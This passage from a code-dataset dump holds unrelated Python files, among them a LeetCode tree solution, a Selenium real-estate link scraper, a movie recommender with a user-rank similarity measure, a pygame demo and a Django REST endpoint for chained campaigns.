1352\n# Dislikes: 45\n# Total Accepted: 429.2K\n# Total Submissions: 842.3K\n# Testcase Example: '[1,2,3]\\n[1,2,3]'\n#\n# Given two binary trees, write a function to check if they are the same or\n# not.\n# \n# Two binary trees are considered the same if they are structurally identical\n# and the nodes have the same value.\n# \n# Example 1:\n# \n# \n# Input: 1 1\n# ⁠ / \\ / \\\n# ⁠ 2 3 2 3\n# \n# ⁠ [1,2,3], [1,2,3]\n# \n# Output: true\n# \n# \n# Example 2:\n# \n# \n# Input: 1 1\n# ⁠ / \\\n# ⁠ 2 2\n# \n# ⁠ [1,2], [1,null,2]\n# \n# Output: false\n# \n# \n# Example 3:\n# \n# \n# Input: 1 1\n# ⁠ / \\ / \\\n# ⁠ 2 1 1 2\n# \n# ⁠ [1,2,1], [1,1,2]\n# \n# Output: false\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, 
x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:\n return self.isSameTree_1(p, q)\n \n def isSameTree_0(self, p: TreeNode, q: TreeNode) -> bool:\n if p and q: return p.val == q.val and \\\n self.isSameTree(p.left, q.left) and \\\n self.isSameTree(p.right, q.right)\n else:\n return p is q\n \n def isSameTree_1(self, p: TreeNode, q: TreeNode) -> bool:\n s0, s1 = [], []\n if p: s0.append(p)\n if q: s1.append(q)\n while s0 and s1:\n n0, n1 = s0.pop(), s1.pop()\n if n0.val != n1.val: return False\n\n if n0.left: s0.append(n0.left)\n if n1.left: s1.append(n1.left)\n if len(s0) != len(s1): return False\n \n if n0.right: s0.append(n0.right)\n if n1.right: s1.append(n1.right)\n if len(s0) != len(s1): return False\n \n return len(s0) == len(s1)\n# @lc code=end","sub_path":"leetcode/100.same-tree.py","file_name":"100.same-tree.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503551656","text":"\"\"\"\nThis module manage options of the package\n\n# Like always, largely inspired by xarray code:\n# https://github.com/pydata/xarray/blob/cafab46aac8f7a073a32ec5aa47e213a9810ed54/xarray/core/options.py\n\"\"\"\nimport os\nfrom argopy.errors import InvalidOption, OptionValueError\n\n# Define option names as seen by users:\nDATA_SOURCE = \"src\"\nLOCAL_FTP = \"local_ftp\"\nDATASET = \"dataset\"\nDATA_CACHE = \"cachedir\"\nUSER_LEVEL = \"mode\"\nAPI_TIMEOUT = \"api_timeout\"\n\n# Define the list of available options and default values:\nOPTIONS = {\n DATA_SOURCE: \"erddap\",\n LOCAL_FTP: \".\",\n DATASET: \"phy\",\n DATA_CACHE: os.path.expanduser(os.path.sep.join([\"~\", \".cache\", \"argopy\"])),\n USER_LEVEL: \"standard\",\n API_TIMEOUT: 60\n}\n\n# Define the list of possible values\n_DATA_SOURCE_LIST = frozenset([\"erddap\", \"localftp\", \"argovis\"])\n_DATASET_LIST = frozenset([\"phy\", \"bgc\", \"ref\"])\n_USER_LEVEL_LIST = frozenset([\"standard\", \"expert\"])\n\n\n# Define how to validate options:\ndef _positive_integer(value):\n return isinstance(value, int) and value > 0\n\n\n_VALIDATORS = {\n DATA_SOURCE: _DATA_SOURCE_LIST.__contains__,\n LOCAL_FTP: os.path.exists,\n DATASET: _DATASET_LIST.__contains__,\n DATA_CACHE: os.path.exists,\n USER_LEVEL: _USER_LEVEL_LIST.__contains__,\n API_TIMEOUT: _positive_integer,\n}\n\n\nclass set_options:\n \"\"\"Set options for argopy.\n\n List of options:\n\n - `dataset`: Define the Dataset to work with.\n Default: `phy`. Possible values: `phy`, `bgc` or `ref`.\n - `src`: Source of fetched data.\n Default: `erddap`. Possible values: `erddap`, `localftp`, `argovis`\n - `local_ftp`: Absolute path to a local GDAC ftp copy.\n Default: `.`\n - `cachedir`: Absolute path to a local cache directory.\n Default: `~/.cache/argopy`\n - `mode`: User mode.\n Default: `standard`. 
Possible values: `standard` or `expert`.\n    - `api_timeout`: Define the time out of internet requests to web API, in seconds.\n        Default: 60\n\n    You can use `set_options` either as a context manager:\n    >>> import argopy\n    >>> with argopy.set_options(src='localftp'):\n    >>>    ds = argopy.DataFetcher().float(3901530).to_xarray()\n\n    Or to set global options:\n    >>> argopy.set_options(src='localftp')\n\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        self.old = {}\n        for k, v in kwargs.items():\n            if k not in OPTIONS:\n                raise ValueError(\n                    \"argument name %r is not in the set of valid options %r\"\n                    % (k, set(OPTIONS))\n                )\n\n            if k in _VALIDATORS and not _VALIDATORS[k](v):\n                raise OptionValueError(f\"option {k!r} given an invalid value: {v!r}\")\n            self.old[k] = OPTIONS[k]\n        self._apply_update(kwargs)\n\n    def _apply_update(self, options_dict):\n        # for k, v in options_dict.items():\n        #    if k in _SETTERS:\n        #        _SETTERS[k](v)\n        OPTIONS.update(options_dict)\n\n    def __enter__(self):\n        return\n\n    def __exit__(self, type, value, traceback):\n        self._apply_update(self.old)\n","sub_path":"argopy/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433803073","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom threading import Thread\nimport time\nimport random\n\n\n#Thread that collects every house link on one results page and appends it to a txt file:\nclass ImmoLinks(Thread):\n    def __init__(self, link):\n        Thread.__init__(self)\n        self.link = link\n\n    def run(self):\n        driver.get(self.link)\n        soup = BeautifulSoup(driver.page_source, features='lxml')\n        for elem in soup.find_all('a', attrs={\"class\": \"card__title-link\"}):\n            with open(\"./houses_links.txt\", 'a') as txt_list:\n                txt_list.write(elem.get(\"href\"))\n                txt_list.write(\"\\n\")\n\n\n#Web scraping\ndriver = webdriver.Chrome(executable_path='C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chromedriver.exe')\n\n#Click the cookies button after opening the website:\ndriver.get('https://www.immoweb.be/en/search/house/for-sale?countries=BE&page=1&orderBy=relevance')\ntime.sleep(random.uniform(1.0, 4.0))\ncookie_button = driver.find_element_by_xpath('/html/body/div[4]/div[4]/div[2]/div/div[2]/div[1]/button')\ncookie_button.click()\ntime.sleep(random.uniform(1.0, 2.0))\n\n#Get all house links from the immoweb \"for-sale\" page=1:\nsoup = BeautifulSoup(driver.page_source, features='lxml')\nfor elem in soup.find_all('a', attrs={\"class\": \"card__title-link\"}):\n    with open(\"./houses_links.txt\", 'a') as txt_list:\n        txt_list.write(elem.get(\"href\"))\n        txt_list.write(\"\\n\")\n\nindex = 2\nfor item in range(331):\n    immo_url = 'https://www.immoweb.be/en/search/house/for-sale?countries=BE&page=1&orderBy=relevance'\n    next_url = immo_url.replace('page=1', f'page={index}')\n    thread = ImmoLinks(next_url)\n    thread.start()\n    # joining immediately after start() makes the pages load one at a time over the shared driver\n    thread.join()\n    index += 1\n\n","sub_path":"immo_links_scraping_v03.py","file_name":"immo_links_scraping_v03.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190219135","text":"import pandas as pd\nimport numpy as np\n\ninput_file = \"C:/Users/Administrator/Desktop/Data/USDNOK.FXCM.asc\"\nba_ready_file = \"C:/Users/Administrator/Desktop/BaData/BA_USDNOK_15min.txt\"\n\n
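# NOTE: the goal below is to roll 1-minute bars up to 15-minute bars; by the usual OHLC\n# convention a 15-minute bar takes the first Open, the max High, the min Low and the\n# last Close of its window, and volume is summed.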
df = pd.read_csv(input_file, index_col=0, parse_dates=[[0, 1]], delimiter=',')\ndf.head()\ndf_open = df['Open'].resample('15Min').first()\ndf_high = df['High'].resample('15Min').max()\ndf_low = df['Low'].resample('15Min').min()\ndf_close = df['Close'].resample('15Min').last()\ndf_vol = df['TotalVolume'].resample('15Min').sum()\n\n# concatenate side by side (axis=1) so there is exactly one row per 15-minute bar\ndf_resample = pd.concat([df_open, df_high, df_low, df_close], axis=1)\ndf_resample.columns = ['open', 'high', 'low', 'close']\ndf_resample = df_resample.dropna()\n\n\n\n# ----------------------\n# Do NOT Change\n#\nfh = open(ba_ready_file, 'w')\nfh.write(\"Date,Time,Open,High,Low,Close,Vol,OI\\n\")\nfor d,o,h,l,c in zip(df_resample.index,df_resample['open'],df_resample['high'],df_resample['low'],df_resample['close']):\n    fh.write(\"%s,%s,%.5f,%.5f,%.5f,%.5f,%d,%d\\n\" % (d.strftime('%m/%d/%Y'),d.strftime('%H:%M'),o,h,l,c,0,0))\nfh.close()","sub_path":"TimeResampler.py","file_name":"TimeResampler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"654015811","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = patterns('',\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^$', auth_views.login),\n    url(r'^logout/', auth_views.logout),\n    url(r'^secure/', include('certchain.urls', namespace='certchain')),\n    url(r'^public/', include('public.urls', namespace='public')),\n)\n","sub_path":"admin/admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"365738424","text":"import pandas as pd\nimport numpy as np\nimport math\n\nclass dataset():\n\n    def __init__(self,nama_dataset):\n        print(nama_dataset)\n        self.matrix_dataset=pd.read_csv(nama_dataset)\n    \n    def matrix_rm(self):\n        # reindexing against the new labels yields an all-NaN user x movie grid to fill below;\n        # note the method rebinds its own name to the resulting DataFrame\n        self.matrix_rm = pd.DataFrame(self.matrix_dataset, index=np.arange(1, self.matrix_dataset[\"User ID\"].max() + 1), columns=np.arange(1, self.matrix_dataset[\"Movie ID\"].max() + 1))\n        for i in range((len(self.matrix_dataset.index))):\n            user = self.matrix_dataset.at[i, \"User ID\"]\n            film = self.matrix_dataset.at[i, \"Movie ID\"]\n            rating = self.matrix_dataset.at[i, \"Rating\"]\n            self.matrix_rm.at[user, film] = rating\n\n        #convert NaN to 0\n        #for item in self.matrix_rm.columns:\n        #    self.matrix_rm[item].fillna(0.0, inplace=True)\n        return self.matrix_rm\n\n    def matrix_crm(self,jml_user):\n        self.matrix_crm = pd.DataFrame(index=np.arange(1, jml_user + 1), columns=np.arange(1, jml_user + 1))\n        for user in self.matrix_rm.index:\n            for user_pembanding in self.matrix_rm.index:\n                if user == user_pembanding:\n                    self.matrix_crm.at[user, user_pembanding] = 0\n                    continue\n                temp = 0\n                for item in self.matrix_rm.columns:\n                    if self.matrix_rm.at[user, item] > 0 and self.matrix_rm.at[user_pembanding, item] > 0:\n                        temp += 1\n                self.matrix_crm.at[user, user_pembanding] = temp\n                print(user, \"and\", user_pembanding, \":\", temp)\n        return self.matrix_crm\n\n    def matrix_cm(self):\n        # copy so normalising the co-rating counts does not mutate matrix_crm in place\n        self.matrix_cm = self.matrix_crm.copy()\n        # row sums only need computing once, before any value is rescaled\n        c = self.matrix_crm.sum(axis=1, skipna=True)\n        for user in self.matrix_crm.index:\n            for item in self.matrix_crm.columns:\n                if self.matrix_crm.at[user, item] > 0:\n                    data_lama = self.matrix_crm.at[user, item]\n                    print(data_lama)\n                    data_baru = data_lama / c[user]\n                    print(data_baru)\n                    self.matrix_cm.at[user, item] = data_baru\n        return self.matrix_cm\n\n    def pageRank(self,alpha=0.5,nilai_error=0.001):\n        self.kolom_iterasi=0\n        jml_user=len(self.matrix_rm.index)\n
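        # NOTE: this is a damped power iteration (PageRank-style update):\n        #   UR_{i+1}(u) = (1 - alpha) * UR_i(u) + alpha * sum_{k in N(u)} UR_i(k) * CM[k, u]\n        # iterated until the Euclidean distance between successive rank columns falls\n        # below nilai_error (checked in cek_selisih below).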
self.matrix_pageRank = pd.DataFrame(index=np.arange(1, jml_user + 1))\n self.matrix_pageRank[0] = 0.2\n\n def cek_selisih(kolom_iterasi, batas_error): #ecluidean distance\n temp_nilai = 0\n for user_rank in self.matrix_pageRank.index:\n temp_nilai += (self.matrix_pageRank.at[user_rank, kolom_iterasi + 1] - self.matrix_pageRank.at[\n user_rank, kolom_iterasi])**2\n selisih_error = math.sqrt(temp_nilai)\n if selisih_error < batas_error:\n ketemu = True\n else:\n ketemu=False\n self.kolom_iterasi+=1\n return ketemu\n\n def list_uk(): #buat cari node tetangga user\n dict_list_uk = {}\n for user_n in (self.matrix_cm.index):\n temp = 0\n uk = []\n for user_k in (self.matrix_cm.columns):\n if self.matrix_cm.at[user_n, user_k] > 0:\n temp += 1\n uk.append(user_k)\n dict_list_uk[user_n] = uk\n return dict_list_uk\n\n while True:\n for user in self.matrix_cm.index:\n temp = 0\n print(\"UR User : \", user)\n for out_user in list_uk()[user]:\n temp += self.matrix_pageRank.at[out_user, self.kolom_iterasi] * self.matrix_cm.at[out_user, user]\n print(\"data uk : \", self.matrix_pageRank.at[out_user, self.kolom_iterasi], \"data cm : \", self.matrix_cm.at[out_user, user], \"hasil uk*cm : \", temp)\n hasil = ((1 - alpha ) * self.matrix_pageRank.at[user, self.kolom_iterasi]) + (alpha * temp)\n print(\"data un : \", self.matrix_pageRank.at[user, self.kolom_iterasi], \"hasil ur : \", hasil)\n self.matrix_pageRank.at[user, self.kolom_iterasi + 1] = hasil\n if cek_selisih(self.kolom_iterasi,nilai_error)==True:\n break\n\n return self.matrix_pageRank\n\n def matrix_s(self,jml_user,jml_item):\n\n matrix_temp_nilai_total_user = self.matrix_rm.sum(axis=1, skipna=True)\n matrix_temp_nilai_rata_user=matrix_temp_nilai_total_user\n for user in self.matrix_rm.index:\n list_total_user = []\n for item in self.matrix_rm.columns:\n if self.matrix_rm.at[user, item] > 0:\n list_total_user.append(item)\n matrix_temp_nilai_rata_user[user] = float(matrix_temp_nilai_total_user[user] / len(list_total_user))\n print(matrix_temp_nilai_rata_user)\n print(self.matrix_rm)\n\n self.matrix_s=pd.DataFrame(index=np.arange(1, jml_user + 1), columns=np.arange(1, jml_item + 1))\n for user in self.matrix_rm.index:\n print(self.matrix_rm.loc[user],matrix_temp_nilai_rata_user[user])\n\n self.matrix_s.loc[user] = self.matrix_rm.loc[user]-matrix_temp_nilai_rata_user[user]\n\n return self.matrix_s\n\n def matrix_similarity_userrank(self,input_user=1):\n\n def cari_user(item_a, item_b):\n irisan_user_pada_item_a_b = []\n for user in self.matrix_s.index:\n if user != input_user:\n if not math.isnan(self.matrix_s.at[user, item_a]) and not math.isnan(self.matrix_s.at[user, item_b]):\n irisan_user_pada_item_a_b.append(user)\n else:\n continue\n print(\"user yang merating item \", item_a, item_b, \": user \", irisan_user_pada_item_a_b)\n return irisan_user_pada_item_a_b\n\n def hitung_similarity(item_a, item_b, list_irisan_a_b):\n atas = 0\n bawah_kiri = 0\n bawah_kanan = 0\n l_atas = []\n l_bawah_kiri = []\n l_bawah_kanan = []\n for user in list_irisan_a_b:\n kolom_terakhir = (self.matrix_pageRank.columns[-1])\n print(\"pagerank user\", user, \"= \", self.matrix_pageRank.at[user, kolom_terakhir], \"**2:\",self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n\n atas += self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b] * (self.matrix_pageRank.at[\n user, kolom_terakhir] ** 2) # str karena tipe data kolom pagerank adlh string\n l_atas.append(self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b] * (self.matrix_pageRank.at[user, 
kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_a, \":\", self.matrix_s.at[user, item_a], \"dan\", user, item_b, \":\",self.matrix_s.at[user, item_b], \"userrank\", user, \":\", (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n\n bawah_kiri += (self.matrix_s.at[user, item_a] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n l_bawah_kiri.append((self.matrix_s.at[user, item_a] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_a, \":\", self.matrix_s.at[user, item_a] ** 2, \"userrank\", user, \":\",self.matrix_pageRank.at[user, kolom_terakhir])\n\n bawah_kanan += (self.matrix_s.at[user, item_b] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2)\n l_bawah_kanan.append((self.matrix_s.at[user, item_b] ** 2) * (self.matrix_pageRank.at[user, kolom_terakhir] ** 2))\n print(\"similaritas \", user, item_b, \":\", self.matrix_s.at[user, item_b] ** 2, \"userrank\", user, \":\", self.matrix_pageRank.at[user, kolom_terakhir])\n\n bawah = (math.sqrt(bawah_kiri)) * (math.sqrt(bawah_kanan))\n hasil = float(atas / bawah)\n print(\"sum atas \", l_atas)\n print(\"sum bawah kiri \", l_bawah_kiri)\n print(\"sum bawah kanan \", l_bawah_kanan)\n print(\"atas \", atas)\n print(\"bawah kiri \", math.sqrt(bawah_kiri))\n print(\"bawah kanan \", math.sqrt(bawah_kanan))\n print(\"bawah \", bawah)\n print(\"similaritas \", item_a, item_b)\n print(\"hasil\", hasil, \">>>>>>>>>>>\\n\")\n return hasil\n\n data_similaritas_user = pd.DataFrame(dtype=float)\n\n temp_item_kosong = []\n temp_item_terisi = []\n print(input_user)\n\n for item in (self.matrix_s.columns):\n if math.isnan(self.matrix_s.at[input_user, item]):\n temp_item_kosong.append(item)\n else:\n temp_item_terisi.append(item)\n\n for item_target in temp_item_kosong:\n for item_pembanding in temp_item_terisi:\n list_irisan_a_b = cari_user(item_target, item_pembanding)\n if len(list_irisan_a_b) == 0:\n continue\n else:\n data_similaritas_user.at[item_target, item_pembanding] = hitung_similarity(item_target, item_pembanding,list_irisan_a_b)\n print(data_similaritas_user)\n return data_similaritas_user\n\n\n def matrix_similarity_traditional(self,input_user=1):\n\n def cari_user(item_a, item_b):\n irisan_user_pada_item_a_b = []\n for user in self.matrix_s.index:\n if user != input_user:\n if not math.isnan(self.matrix_s.at[user, item_a]) and not math.isnan(self.matrix_s.at[user, item_b]):\n irisan_user_pada_item_a_b.append(user)\n else:\n continue\n print(\"user yang merating item \", item_a, item_b, \": user \", irisan_user_pada_item_a_b)\n return irisan_user_pada_item_a_b\n\n def hitung_similarity(item_a, item_b, list_irisan_a_b):\n atas = 0\n bawah_kiri = 0\n bawah_kanan = 0\n l_atas = []\n l_bawah_kiri = []\n l_bawah_kanan = []\n for user in list_irisan_a_b:\n atas += self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b]\n l_atas.append(self.matrix_s.at[user, item_a] * self.matrix_s.at[user, item_b])\n bawah_kiri += self.matrix_s.at[user, item_a] ** 2\n l_bawah_kiri.append(self.matrix_s.at[user, item_a] ** 2)\n\n bawah_kanan += self.matrix_s.at[user, item_b] ** 2\n l_bawah_kanan.append(self.matrix_s.at[user, item_b] ** 2)\n bawah = (math.sqrt(bawah_kiri)) * (math.sqrt(bawah_kanan))\n\n hasil = float(atas / bawah)\n\n print(\"sum atas \", l_atas)\n print(\"sum bawah kiri \", l_bawah_kiri)\n print(\"sum bawah kanan \", l_bawah_kanan)\n print(\"atas \", atas)\n print(\"bawah kiri \", math.sqrt(bawah_kiri))\n print(\"bawah kanan \", math.sqrt(bawah_kanan))\n 
print(\"bawah \", bawah)\n print(\"similaritas \", item_a, item_b)\n print(\"hasil\", hasil, \">>>>>>>>>>>\\n\")\n return hasil\n\n data_similaritas_user = pd.DataFrame(dtype=float)\n\n temp_item_kosong = []\n temp_item_terisi = []\n print(input_user)\n\n for item in (self.matrix_s.columns):\n if math.isnan(self.matrix_s.at[input_user, item]):\n temp_item_kosong.append(item)\n else:\n temp_item_terisi.append(item)\n\n for item_target in temp_item_kosong:\n for item_pembanding in temp_item_terisi:\n list_irisan_a_b = cari_user(item_target, item_pembanding)\n if len(list_irisan_a_b) == 0:\n continue\n else:\n data_similaritas_user.at[item_target, item_pembanding] = hitung_similarity(item_target, item_pembanding,list_irisan_a_b)\n print(data_similaritas_user)\n return data_similaritas_user\n\n def matrix_prediksi(self,tipe,input_K=2):\n\n def cari_tetangga(item_target, banyak_tetangga):\n temp_per_item_target = data.loc[item_target] # select per index\n temp_per_item_target.sort_values(ascending=False, inplace=True) # sorting desc\n temp_per_item_target = temp_per_item_target.iloc[:banyak_tetangga] # spit berdasarkan max k\n print(temp_per_item_target)\n list_QtU_item_k = temp_per_item_target.index.tolist() # get index/item dari data stlh disorting convert ke list\n print(list_QtU_item_k)\n return list_QtU_item_k\n\n def hitung_function(user_target, item_target, list_item_similar_qtu):\n atas = 0.0\n bawah = 0.0\n\n for item_similar in list_item_similar_qtu:\n atas += data.at[item_target, item_similar] * self.matrix_rm.at[user_target, item_similar]\n bawah += math.fabs(data.at[item_target, item_similar])\n print(\"similaritas item(\", item_target, item_similar, \")= \", data.at[item_target, item_similar],\" * rating user item(\", user_target, item_similar, \")= \",self.matrix_rm.at[user_target, item_similar])\n print(\"absolute similaritas item(\", item_target, item_similar, \")= \",math.fabs(data.at[item_target, item_similar]))\n hasil = float(atas) / float(bawah)\n print(hasil)\n return hasil\n\n if tipe==\"traditional\":\n self.matrix_rm_plus_prediksi=self.matrix_rm.copy()\n for user_target in self.matrix_rm.index:\n data = self.matrix_similarity_traditional(user_target)\n data_hasil = {}\n for item_target in data.index:\n QtU = cari_tetangga(item_target, input_K)\n hasil = hitung_function(user_target, item_target, QtU)\n data_hasil[item_target] = hasil\n self.matrix_rm_plus_prediksi.at[user_target, item_target] = hasil\n\n return self.matrix_rm_plus_prediksi\n\n elif tipe == \"userrank\":\n self.matrix_rm_plus_prediksi_userrank = self.matrix_rm.copy()\n for user_target in self.matrix_rm.index:\n data = self.matrix_similarity_userrank(user_target)\n data_hasil = {}\n for item_target in data.index:\n QtU = cari_tetangga(item_target, input_K)\n hasil = hitung_function(user_target, item_target, QtU)\n data_hasil[item_target] = hasil\n self.matrix_rm_plus_prediksi_userrank.at[user_target, item_target] = hasil\n\n return self.matrix_rm_plus_prediksi_userrank\n\n def lihat_top_n(self,tipe=\"traditional\",user_target=1,top_n=2):\n\n if tipe==\"traditional\":\n data_top_n = self.matrix_rm_plus_prediksi.loc[user_target]\n for item in self.matrix_rm.columns:\n if not math.isnan(self.matrix_rm.at[user_target, item]):\n del data_top_n[item]\n\n data_top_n.sort_values(ascending=False, inplace=True) # sorting desc\n data_top_n = data_top_n.iloc[:top_n]\n return (data_top_n)\n\n\n elif tipe == \"userrank\":\n data_top_n = self.matrix_rm_plus_prediksi_userrank.loc[user_target]\n for item in 
self.matrix_rm.columns:\n if not math.isnan(self.matrix_rm.at[user_target, item]):\n del data_top_n[item]\n\n data_top_n.sort_values(ascending=False, inplace=True) # sorting desc\n data_top_n = data_top_n.iloc[:top_n]\n return (data_top_n)\n\n #for item in self.matrix_rm.columns:\n\n\n\nfold=1\nfor i in range (1,fold+1):\n afni=dataset(\"base_\"+str(i)+\"_dataset.csv\")\n #print(afni.matrix_dataset)\n\n (afni.matrix_rm())\n total_user=len(afni.matrix_rm.index)\n total_item=len(afni.matrix_rm.columns)\n (afni.matrix_crm(total_user))\n (afni.matrix_cm())\n (afni.pageRank(nilai_error=0.001))\n #(afni.matrix_rm)\n \n print(afni.matrix_s(total_user,total_item))\n afni.matrix_rm.to_csv(\"matrik_rating_base_\"+str(i)+\".csv\")\n\n print(\">>>>>>>>>>>>>>>>>>>\")\n print(afni.matrix_prediksi(\"traditional\",2))\n print(afni.matrix_rm_plus_prediksi)\n print(afni.matrix_rm_plus_prediksi.to_csv(\"base_\"+str(i)+\"_matrik_prediksi_traditional_itembase.csv\"))\n #print(afni.lihat_top_n(\"traditional\",5,2))\n\n\n #print(afni.matrix_prediksi(\"userrank\",2))\n #print(afni.matrix_rm_plus_prediksi_userrank)\n #print(afni.matrix_rm_plus_prediksi_userrank.to_csv(\"base_\"+str(i)+\"_matrik_prediksi_userrank_itembase.csv\"))\n #print(afni.lihat_top_n(\"userrank\",5,2))\n\n \n","sub_path":"real-dataset(1 program)/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":16700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"244468725","text":"'''\n Escribir un programa que pida al usuario un numero entero y muestre por pantalla un triangulo rectangulo\n\n *\n **\n ***\n ****\n *****\n'''\n\nlon = input('Elije el tamaño del arbol: ')\n\ntry:\n lon=int(lon)\nexcept:\n print('solo se pueden poner numeros')\n\nfor i in range(lon):\n print('*' * (i + 1))","sub_path":"arbol.py","file_name":"arbol.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"251127179","text":"from gates import xor\n\n\ndef full_adder(first,last):\n c_out = 0\n result = ''\n for i in range(len(first)-1,-1,-1):\n sum_ = xor(xor(int(first[i]),int(last[i])),c_out)\n c_out = (int(first[i]) and int(last[i])) or (c_out and (xor(int(first[i]),int(last[i]))))\n result += str(sum_)\n result+=str(c_out)\n return result[::-1]","sub_path":"byte_adder.py","file_name":"byte_adder.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"193266637","text":"import pygame, sys\n\npygame.init()\n\nscreen = pygame.display.set_mode((500, 500))\n\n# 加载全部字体\nfonts = pygame.font.get_fonts()\n#print(front)\n\nred = pygame.Color(255, 0, 0)\n\n# 加粗,斜体\n# 使用系统默认的字体文件\nfont = pygame.font.SysFont('华文新魏', 40, True, True)\n# 使用项目中字体\n# font = gygame.font.Font('')\n\n\n# 文字对象\ntext = font.render(\"得分\", False, red)\ntext2 = font.render(\"TEST\", False, red)\n\n\n# 音乐\nbg_music = pygame.mixer.music.load('/pygame/a_demo\\\\game_bg_music.mp3')\npygame.mixer.music.play(-1)\n\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n\n # 绘制图形\n screen.blit(text, (20, 20))\n screen.blit(text2, (120, 120))\n # 更新\n pygame.display.flip()","sub_path":"pygame/a_demo/use_font.py","file_name":"use_font.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"514782109","text":"import 
flask\n\nimport json\n\nfrom rest_api.RestAPIMethod import RESTResource, GetRESTResource\nfrom couchdb_layer.mcm_database import Database\nfrom model_layer.chained_campaign import ChainedCampaign\nfrom tools.user_management import Roles\n\n\nclass GetChainedCampaign(GetRESTResource):\n\n def __init__(self):\n GetRESTResource.__init__(self, 'chained_campaigns')\n\n\nclass CreateChainedCampaign(RESTResource):\n\n allowed_role = Roles.production_manager\n\n def __init__(self):\n RESTResource.__init__(self)\n self.db_name = 'chained_campaigns'\n self.before_request()\n\n def put(self):\n \"\"\"\n Create a chained campaign from the provide json content\n \"\"\"\n data = flask.request.data\n if not data:\n return self.output_text({'results': False,\n 'message': 'No data was found in request'},\n code=400)\n\n chained_campaign = ChainedCampaign(json_input=json.loads(data.decode('utf-8')))\n chained_campaign_campaigns = chained_campaign.get('campaigns')\n if len(chained_campaign_campaigns) < 2:\n return self.output_text({'results': False,\n 'message': 'Chained campaign must have at least two campaigns'},\n code=400)\n\n campaigns_db = Database('campaigns')\n flows_db = Database('flows')\n if not campaigns_db.prepid_exists(chained_campaign_campaigns[0]['campaign']):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" does not exist' % (chained_campaign_campaigns[0]['campaign'])},\n code=400)\n\n if not campaigns_db.get(chained_campaign_campaigns[0]['campaign']).get('is_root'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" cannot be root' % (chained_campaign_campaigns[0]['campaign'])},\n code=400)\n\n chained_campaign_id = 'chain_%s' % (chained_campaign_campaigns[0]['campaign'])\n for index, campaign_flow_pair in enumerate(chained_campaign_campaigns):\n campaign_id = campaign_flow_pair['campaign']\n if not campaigns_db.prepid_exists(campaign_id):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" does not exist' % (campaign_id)},\n code=400)\n\n if index == 0:\n continue\n\n flow_id = campaign_flow_pair['flow']\n flow = flows_db.get(flow_id)\n if not flow:\n return self.output_text({'results': False,\n 'message': 'Flow \"%s\" does not exist' % (flow_id)},\n code=400)\n\n previous_campaign_id = chained_campaign_campaigns[index - 1]['campaign']\n if previous_campaign_id not in flow.get('source_campaigns'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" is not in \"%s\" source campaigns' % (previous_campaign_id,\n flow_id)},\n code=400)\n\n if campaign_id != flow.get('target_campaign'):\n return self.output_text({'results': False,\n 'message': 'Campaign \"%s\" is not \"%s\" target campaign' % (campaign_id,\n flow_id)},\n code=400)\n\n chained_campaign_id += '_%s' % (flow_id)\n\n chained_campaigns_db = Database('chained_campaigns')\n if chained_campaigns_db.prepid_exists(chained_campaign_id):\n return self.output_text({'results': False,\n 'message': 'Chained campaign \"%s\" already exists' % (chained_campaign_id)},\n code=409)\n\n chained_campaign.set('_id', chained_campaign_id)\n chained_campaign.set('prepid', chained_campaign_id)\n # update history\n chained_campaign.update_history(None, 'created', chained_campaign_id)\n if not chained_campaigns_db.save(chained_campaign.json()):\n self.logger.error('Could not save chained campaign \"%s\" to database' % (chained_campaign_id))\n return self.output_text({'results': False,\n 'message': 'Error saving chained campaign to database'},\n code=500)\n\n return 
